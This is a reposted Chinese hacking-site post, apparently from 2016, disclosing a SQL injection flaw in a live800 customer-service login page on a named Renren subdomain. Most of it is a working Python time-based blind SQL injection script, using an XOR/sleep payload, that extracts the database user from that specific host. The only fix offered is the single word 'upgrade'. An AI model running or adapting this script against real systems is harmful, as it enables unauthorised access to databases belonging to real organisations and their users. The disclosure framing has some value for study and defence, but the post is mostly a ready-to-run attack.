记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

人人网某站存在SQL注射漏洞附验证脚本

2016-03-10 00:05

人人网某站sql注入漏洞

最近live800好像很火 就乌云搜索了一下.....http://live800.wan.renren.com/live800/loginAction.jsp?companyLoginName=1*&loginName=a111&password=111 live800客服系统 这个被那位大牛爆了很多洞找了个lijiejie脚本 刚开始一直不行 爆incomplete format什么异常、、、 折腾了一会、、弄完脚本瞬间感觉高富帅了 哈哈 求首页啊


import httplib
import time
import string
import sys
import random
import urllib
headers = {}
payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'
print '[%s] Start to retrive MySQL User:' % time.strftime('%H:%M:%S', time.localtime())
user = ''
for i in range(1, 21):
    for payload in payloads:
        try:
            s = "ascii(mid(lower(user()),%s,1))=%s" % (i, ord(payload))
            s = "1'XOR(if(%s,sleep(3),0))OR'1" % s
            conn = httplib.HTTPConnection('live800.wan.renren.com', timeout=3)
            conn.request(method='GET',url="/live800/loginAction.jsp?companyLoginName=1%s&loginName=a111&password=111" % urllib.quote(s))
            conn.getresponse()
            conn.close()
            print '.',
        except Exception,e:
            print e
            user += payload
            print '\n[in progress]', user,
            time.sleep(3.0)
            break
print '\n[Done] MySQL user is %s' % user
解决方案:
升级


知识来源: www.2cto.com/Article/201603/492723.html

阅读:162147 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“人人网某站存在SQL注射漏洞附验证脚本”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

永久免费持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

求投资、赞助、支持💖

标签云